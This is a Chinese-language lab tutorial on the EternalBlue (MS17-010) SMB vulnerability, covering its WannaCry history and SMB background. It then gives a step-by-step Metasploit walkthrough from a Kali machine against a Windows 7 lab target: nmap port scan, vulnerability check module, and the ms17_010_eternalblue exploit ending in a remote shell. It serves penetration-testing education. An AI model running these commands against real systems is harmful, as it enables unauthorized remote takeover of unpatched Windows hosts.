“庖丁解牛”细说“永恒之蓝” | 您所在的位置:网站首页 › windows永恒之蓝 › “庖丁解牛”细说“永恒之蓝” |
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 前提需要攻击机:192.168.50.120 (Kali安装Metaploit工具) 靶机:192.168.50.140(windows 7靶机且关闭防火墙) 拓展:其实win7在“工作网络”模式下,打开防火墙也可以成功。默认设置为公用网络。 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 漏洞利用1.打开kali终端窗口,扫描一下靶机是否开启了445端口以及查看版本信息 nmap -sV -p 445 192.168.50.140 得到靶机的445端口信息,以及系统版本 2.启动msfconsole ,输入search ms17-010 拓展: Rank(等级),其实就是好用程度等级,排名是excellent极好的 >great很好的>good>normal正常>average平均值>low低。 Check (检查):最好用yes项的。 3.利用auxiliary模块进行漏洞验证,可以使用use 4进行验证是否存在永恒之蓝漏洞 use auxiliary/scanner/smb/smb_ms17_010 然后查看具体需要配置的东西 show options 4.设置攻击目标及端口 set rhosts 192.168.50.140 set rport 445 只设置Required列为yes的就可以。 5.配置完后使用run命令开始测试,出现第一行的内容,说明可以利用该漏洞 6.back返回,寻找攻击模块对其进行渗透,use 0 开始设置相应参数,前面已演示过。 设置好后,最好show options查看一下。 拓展: 为什么选择use 0?(见前面图) 学好英文很关键,仔细阅读出真知! exploit/windows/smb/ms17_010_eternalblue 最后的单词表示永恒之蓝,Rank为平均值,Chick为yes。 exploit/windows/smb/ms17_010_eternalblue_win8 ,用在win8系统,Chick为NO。 7.配置完输入run进行攻击,有时要多试几次,成功进入第三提示符 8.查看系统信息 拓展: chcp 65001可以解决乱码! 反弹shell后,后续的事情就可以自由发挥了!!!------------------------祝你好运!!! |
CopyRight 2018-2019 实验室设备网 版权所有 |